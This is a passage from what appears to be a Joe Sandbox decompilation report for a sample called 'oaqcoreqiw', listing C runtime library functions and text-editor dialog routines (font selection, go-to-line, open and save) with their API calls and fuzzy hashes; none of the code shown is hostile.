						 *((intOrPtr*)(E010A6117())) = 0x16;
						E010A4035();
						_t45 = 0;
					}
					return E010A6235(_t45);
				}
				L20:
			}

















                                                  0x010b6818
                                                  0x010b681b
                                                  0x010b681e
                                                  0x010b681f
                                                  0x010b6824
                                                  0x010b6848
                                                  0x010b684b
                                                  0x010b6826
                                                  0x010b6826
                                                  0x010b6827
                                                  0x010b682a
                                                  0x010b682a
                                                  0x010b6835
                                                  0x010b683a
                                                  0x010b683f
                                                  0x00000000
                                                  0x00000000
                                                  0x010b6841
                                                  0x010b6845
                                                  0x00000000
                                                  0x010b6847
                                                  0x00000000
                                                  0x010b6847
                                                  0x00000000
                                                  0x010b6845
                                                  0x010b684c
                                                  0x010b684d
                                                  0x010b684e
                                                  0x010b684f
                                                  0x010b6850
                                                  0x010b6851
                                                  0x010b6856
                                                  0x010b6857
                                                  0x010b6859
                                                  0x010b685e
                                                  0x010b6863
                                                  0x010b6865
                                                  0x010b6868
                                                  0x010b686c
                                                  0x010b688a
                                                  0x010b688c
                                                  0x010b688f
                                                  0x010b6894
                                                  0x010b6898
                                                  0x010b68a9
                                                  0x010b68ab
                                                  0x010b68ae
                                                  0x010b68b0
                                                  0x010b68b8
                                                  0x010b68be
                                                  0x010b68c9
                                                  0x010b68d0
                                                  0x010b68d4
                                                  0x010b68e8
                                                  0x010b68ea
                                                  0x010b68ed
                                                  0x010b68ef
                                                  0x010b69a8
                                                  0x010b69ae
                                                  0x010b68f5
                                                  0x010b68f5
                                                  0x010b68f9
                                                  0x010b6903
                                                  0x010b690a
                                                  0x010b690c
                                                  0x010b690e
                                                  0x010b690e
                                                  0x010b690c
                                                  0x010b691a
                                                  0x010b6920
                                                  0x010b6927
                                                  0x010b692c
                                                  0x010b6932
                                                  0x010b693a
                                                  0x010b693e
                                                  0x010b6940
                                                  0x010b6947
                                                  0x010b6951
                                                  0x010b6958
                                                  0x010b695e
                                                  0x010b6964
                                                  0x010b6969
                                                  0x010b696f
                                                  0x010b6974
                                                  0x010b6977
                                                  0x010b6977
                                                  0x010b6947
                                                  0x010b697c
                                                  0x010b6980
                                                  0x010b6980
                                                  0x010b68ef
                                                  0x010b69b5
                                                  0x010b69bc
                                                  0x010b69c1
                                                  0x010b686e
                                                  0x010b6873
                                                  0x010b6879
                                                  0x010b687e
                                                  0x010b687e
                                                  0x010b69c8
                                                  0x010b69c8
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 790675137-0
                                                  • Opcode ID: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction ID: efe6c5876d71e908daa36a8e4fc6b21211ce6033b50e6187086db5f758fb727b
                                                  • Opcode Fuzzy Hash: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction Fuzzy Hash: F941027240030AEFDB10AFE8E884BDD7BF4AF24314F10416DE9999A281DBB79601CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B4EB3 Relevance: 13.6, APIs: 9, Instructions: 66COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010B4EB3(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E010A732B(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E010AE743(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10c2de0; // 0xf22f58
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E010AE743(2);
							if(E010AE743(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E010AE743(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E010AE6BD(_t35);
					 *((char*)( *((intOrPtr*)(0x10c2de0 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E010A60F6(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                                  0x010b4eb6
                                                  0x010b4ebd
                                                  0x010b4ec6
                                                  0x010b4ed3
                                                  0x010b4f25
                                                  0x010b4f25
                                                  0x010b4ed5
                                                  0x010b4ed5
                                                  0x010b4edd
                                                  0x010b4eeb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010b4ef3
                                                  0x010b4ef3
                                                  0x010b4ef5
                                                  0x010b4f07
                                                  0x00000000
                                                  0x010b4f09
                                                  0x010b4f09
                                                  0x010b4f19
                                                  0x00000000
                                                  0x010b4f1b
                                                  0x010b4f21
                                                  0x010b4f21
                                                  0x010b4f19
                                                  0x010b4f07
                                                  0x010b4edd
                                                  0x010b4f28
                                                  0x010b4f40
                                                  0x010b4f47
                                                  0x010b4f55
                                                  0x010b4f49
                                                  0x010b4f50
                                                  0x010b4f50
                                                  0x010b4f5a
                                                  0x010b4ebf
                                                  0x010b4ec3
                                                  0x010b4ec3

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B4EB6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  • __get_osfhandle.LIBCMT ref: 010B4ECA
                                                  • __get_osfhandle.LIBCMT ref: 010B4EF5
                                                  • __get_osfhandle.LIBCMT ref: 010B4EFE
                                                  • __get_osfhandle.LIBCMT ref: 010B4F0A
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,00000000,00000109), ref: 010B4F11
                                                  • GetLastError.KERNEL32(?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,00000000,00000109), ref: 010B4F1B
                                                  • __free_osfhnd.LIBCMT ref: 010B4F28
                                                  • __dosmaperr.LIBCMT ref: 010B4F4A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                  • String ID:
                                                  • API String ID: 974577687-0
                                                  • Opcode ID: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction ID: f86e46c417653817b8e0905dd52ce2df119757fb38dfdc4208d81a367b7fdf73
                                                  • Opcode Fuzzy Hash: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction Fuzzy Hash: 1E118C3260511215E671227CA8CC7FE3BD85B92730F590388F9EECB1C3FE65C2418280
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2340 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2340() {
				struct %anon40 _v64;
				void _v156;
				int _t19;
				int _t23;
				void* _t25;

				memcpy( &_v156, 0x10c3f40, 0x17 << 2);
				E010A66E0( &_v64, 0, 0x3c);
				_v64.hwndOwner =  *0x10c3f24;
				_v64.lpLogFont =  &_v156;
				_v64.lStructSize = 0x3c;
				_v64.Flags = 0x1000041;
				_t19 = ChooseFontW( &_v64);
				if(_t19 != 0) {
					_t25 =  *0x10c3f30;
					 *0x10c3f30 = CreateFontIndirectW( &_v156);
					memcpy(0x10c3f40,  &_v156, 0x17 << 2);
					_t23 = SendMessageW( *0x10c3f2c, 0x30,  *0x10c3f30, 1);
					if(_t25 != 0) {
						_t23 = DeleteObject(_t25);
					}
					return _t23;
				}
				return _t19;
			}








                                                  0x010a2363
                                                  0x010a2365
                                                  0x010a236f
                                                  0x010a237b
                                                  0x010a2382
                                                  0x010a2389
                                                  0x010a2390
                                                  0x010a2398
                                                  0x010a239b
                                                  0x010a23b0
                                                  0x010a23c5
                                                  0x010a23d5
                                                  0x010a23dd
                                                  0x010a23e0
                                                  0x010a23e0
                                                  0x00000000
                                                  0x010a23e6
                                                  0x010a23ec

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Font$ChooseCreateDeleteIndirectMessageObjectSend_memset
                                                  • String ID: <$A
                                                  • API String ID: 3794199884-570643782
                                                  • Opcode ID: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction ID: 7a29cddd51ea12a122c8cdcb81fdf194d50a3233dbb07d826403b7cab9581bec
                                                  • Opcode Fuzzy Hash: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction Fuzzy Hash: F71173729202099BEB609FA4ECC4BCE77B8F709704F004065F68DAB245DB765549CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A27B0 Relevance: 10.6, APIs: 7, Instructions: 54windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A27B0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t15;

				_t8 = _a8 - 0x110;
				if(_t8 == 0) {
					SetDlgItemInt(_a4, 0x194, SendMessageW( *0x10c3f2c, 0xc9, 0xffffffff, 0) + 1, 0);
					goto L7;
				} else {
					if(_t8 != 1) {
						L7:
						return 0;
					} else {
						_t15 = _a12 - 1;
						if(_t15 == 0) {
							SendMessageW( *0x10c3f2c, 0xb1, SendMessageW( *0x10c3f2c, 0xbb, GetDlgItemInt(_a4, 0x194, 0, 0) - 1, 0), _t18);
							EndDialog(_a4, 1);
							return 1;
						} else {
							if(_t15 != 1) {
								goto L7;
							} else {
								EndDialog(_a4, 2);
								return 1;
							}
						}
					}
				}
			}





                                                  0x010a27b6
                                                  0x010a27bb
                                                  0x010a2854
                                                  0x00000000
                                                  0x010a27bd
                                                  0x010a27be
                                                  0x010a285a
                                                  0x010a285d
                                                  0x010a27c4
                                                  0x010a27c7
                                                  0x010a27c8
                                                  0x010a2819
                                                  0x010a2824
                                                  0x010a2830
                                                  0x010a27ca
                                                  0x010a27cb
                                                  0x00000000
                                                  0x010a27d1
                                                  0x010a27d6
                                                  0x010a27e2
                                                  0x010a27e2
                                                  0x010a27cb
                                                  0x010a27c8
                                                  0x010a27be

                                                  APIs
                                                  • EndDialog.USER32(?,00000002), ref: 010A27D6
                                                  • GetDlgItemInt.USER32(?,00000194,00000000,00000000), ref: 010A27F1
                                                  • SendMessageW.USER32(000000BB,-00000001,00000000), ref: 010A2806
                                                  • SendMessageW.USER32(000000B1,00000000,00000000), ref: 010A2819
                                                  • EndDialog.USER32(?,00000001), ref: 010A2824
                                                  • SendMessageW.USER32(000000C9,000000FF,00000000), ref: 010A2842
                                                  • SetDlgItemInt.USER32(?,00000194,00000001,00000000), ref: 010A2854
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DialogItem
                                                  • String ID:
                                                  • API String ID: 3626491743-0
                                                  • Opcode ID: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction ID: e6c11a7046e927d2f13821a542ba69f3963b244d109982ba229e30fd1d703c91
                                                  • Opcode Fuzzy Hash: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction Fuzzy Hash: AE014C31290209BFFB315BA4ED99FA63B64F708700F508421FAD9D81E4C7BB98619B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6054 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E010B6054(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr* _t17;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x10bf568);
				_t11 = E010A61F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					E010A8834(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10c19f8) {
						E010A8C4B( *(_t31 + 4));
					}
					 *(_t32 - 4) = 0xfffffffe;
					E010B6664();
					if( *_t31 != 0) {
						E010A8834(0xc);
						 *(_t32 - 4) = 1;
						E010AEB5D( *_t31);
						_t17 =  *_t31;
						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x10c1da0) {
							E010AEA03(_t17);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E010B6670();
					}
					_t11 = E010A8C4B(_t31);
				}
				return E010A6235(_t11);
			}







                                                  0x010b65bf
                                                  0x010b65c1
                                                  0x010b65c6
                                                  0x010b65cb
                                                  0x010b65d0
                                                  0x010b65d8
                                                  0x010b65de
                                                  0x010b65e6
                                                  0x010b6601
                                                  0x010b6606
                                                  0x010b6607
                                                  0x010b660e
                                                  0x010b6616
                                                  0x010b661a
                                                  0x010b6620
                                                  0x010b6629
                                                  0x010b662f
                                                  0x010b6633
                                                  0x010b6642
                                                  0x010b6647
                                                  0x010b6648
                                                  0x010b664f
                                                  0x010b664f
                                                  0x010b6655
                                                  0x010b665a
                                                  0x010b6660

                                                  APIs
                                                  • __lock.LIBCMT ref: 010B65D8
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 010B65EB
                                                  • _free.LIBCMT ref: 010B6601
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • __lock.LIBCMT ref: 010B661A
                                                  • ___removelocaleref.LIBCMT ref: 010B6629
                                                  • ___freetlocinfo.LIBCMT ref: 010B6642
                                                  • _free.LIBCMT ref: 010B6655
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 556454624-0
                                                  • Opcode ID: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction ID: d4aedcfcff14dbf283d9147e3305e122552913258adb3f2100576e80a287de2f
                                                  • Opcode Fuzzy Hash: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction Fuzzy Hash: 6601F531402302E6EB787FA8D9887DD7BE0AF24B12F5485AEE1D5AA0D0CF3685C0CE15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A7B33 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E010A7B33(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E010A461A(_t3);
				if(E010A8983() != 0) {
					_t6 = E010A80A2(_t5, E010A7893);
					 *0x10c15a0 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E010A8C83(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E010A7BA9();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E010A80CC(_t9,  *0x10c15a0, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E010A7A87(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E010A7BA9();
					return 0;
				}
			}








                                                  0x010a7b33
                                                  0x010a7b3f
                                                  0x010a7b4e
                                                  0x010a7b54
                                                  0x010a7b59
                                                  0x010a7b5c
                                                  0x00000000
                                                  0x010a7b5e
                                                  0x010a7b6b
                                                  0x010a7b6f
                                                  0x010a7b71
                                                  0x010a7ba0
                                                  0x010a7ba0
                                                  0x010a7ba5
                                                  0x010a7ba8
                                                  0x010a7b73
                                                  0x010a7b81
                                                  0x010a7b83
                                                  0x00000000
                                                  0x010a7b85
                                                  0x010a7b85
                                                  0x010a7b87
                                                  0x010a7b88
                                                  0x010a7b8f
                                                  0x010a7b95
                                                  0x010a7b99
                                                  0x010a7b9d
                                                  0x010a7b9f
                                                  0x010a7b9f
                                                  0x010a7b83
                                                  0x010a7b71
                                                  0x010a7b41
                                                  0x010a7b41
                                                  0x010a7b41
                                                  0x010a7b48
                                                  0x010a7b48

                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 010A7B33
                                                    • Part of subcall function 010A461A: RtlEncodePointer.NTDLL(00000000,?,010A7B38,010A3D79,010BEFC0,00000014), ref: 010A461D
                                                    • Part of subcall function 010A461A: __initp_misc_winsig.LIBCMT ref: 010A463E
                                                  • __mtinitlocks.LIBCMT ref: 010A7B38
                                                    • Part of subcall function 010A8983: InitializeCriticalSectionAndSpinCount.KERNEL32(010C15B0,00000FA0,?,?,010A7B3D,010A3D79,010BEFC0,00000014), ref: 010A89A1
                                                  • __mtterm.LIBCMT ref: 010A7B41
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A889F
                                                    • Part of subcall function 010A7BA9: _free.LIBCMT ref: 010A88A6
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(010C15B0,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A88C8
                                                  • __calloc_crt.LIBCMT ref: 010A7B66
                                                  • __initptd.LIBCMT ref: 010A7B88
                                                  • GetCurrentThreadId.KERNEL32 ref: 010A7B8F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 757573777-0
                                                  • Opcode ID: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction ID: 7eb80ed30f49d0daac90950ce86de811a83d6e2ce3fd4cbae2d4194d1fdabfb5
                                                  • Opcode Fuzzy Hash: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction Fuzzy Hash: 23F0F6725A93135EE2743BF8BC02BDA76C48F212B2F98CB2AE2E0D50C0FF2280008540
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A16A0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A16A0() {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				int _t24;

				E010A66E0( &_v92, 0, 0x58);
				lstrcpyW( &_v612, L"*.txt");
				_v88 =  *0x10c3f24;
				_v84 =  *0x10c3f20;
				_v64 =  &_v612;
				_v92 = 0x58;
				_v80 = 0x10c47c4;
				_v60 = 0;
				_v40 = 0x881864;
				_v24 = E010A15A0;
				_v20 = 0x190;
				_v32 = L"txt";
				 *0x10c4c88 = 0;
				 *0x10c4c8c = 1;
				_t24 = GetOpenFileNameW( &_v92);
				if(_t24 != 0) {
					return E010A1140(_v64,  *0x10c4c88);
				}
				return _t24;
			}















                                                  0x010a16b1
                                                  0x010a16c5
                                                  0x010a16d0
                                                  0x010a16d8
                                                  0x010a16e1
                                                  0x010a16e8
                                                  0x010a16ef
                                                  0x010a16f6
                                                  0x010a16fd
                                                  0x010a1704
                                                  0x010a170b
                                                  0x010a1712
                                                  0x010a1719
                                                  0x010a1723
                                                  0x010a172d
                                                  0x010a1735
                                                  0x00000000
                                                  0x010a1740
                                                  0x010a1748

                                                  APIs
                                                  • _memset.LIBCMT ref: 010A16B1
                                                  • lstrcpyW.KERNEL32 ref: 010A16C5
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 010A172D
                                                    • Part of subcall function 010A1140: GetWindowTextLengthW.USER32 ref: 010A1153
                                                    • Part of subcall function 010A1140: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileLengthMessageNameOpenSendTextWindow_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 4227841899-3431318540
                                                  • Opcode ID: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction ID: 92d52003eed7d8680851fe337cb19797e5aff78e477e03f560248714daebb773
                                                  • Opcode Fuzzy Hash: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction Fuzzy Hash: 891117B4D0024C9FDB10DFE4E888BDEBBF8BB08304F004119E594AB284EBBA5548CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1770 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A1770() {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				signed int _t24;

				E010A66E0( &_v92, 0, 0x58);
				lstrcpyW( &_v612, L"*.txt");
				_v88 =  *0x10c3f24;
				_v84 =  *0x10c3f20;
				_v64 =  &_v612;
				 *0x10c4c88 =  *0x10c47c0;
				_v92 = 0x58;
				_v80 = 0x10c47c4;
				_v60 = 0;
				_v40 = 0x880866;
				_v24 = E010A15A0;
				_v20 = 0x190;
				_v32 = L"txt";
				 *0x10c4c8c = 0;
				_t24 = GetSaveFileNameW( &_v92);
				asm("sbb eax, eax");
				return  ~( ~_t24);
			}















                                                  0x010a1781
                                                  0x010a1795
                                                  0x010a17a0
                                                  0x010a17a8
                                                  0x010a17b1
                                                  0x010a17b9
                                                  0x010a17c2
                                                  0x010a17c9
                                                  0x010a17d0
                                                  0x010a17d7
                                                  0x010a17de
                                                  0x010a17e5
                                                  0x010a17ec
                                                  0x010a17f3
                                                  0x010a17fd
                                                  0x010a1805
                                                  0x010a180c

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 524411262-3431318540
                                                  • Opcode ID: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction ID: 40828d66436edc55ada890cdc79ebb65e4e918d35b8b62dc30c5eb75b4e12477
                                                  • Opcode Fuzzy Hash: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction Fuzzy Hash: CF01E9B4D4024D9FDB50DFE4E8897DEBBF8BB08704F004519E495EB284E77A55488F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

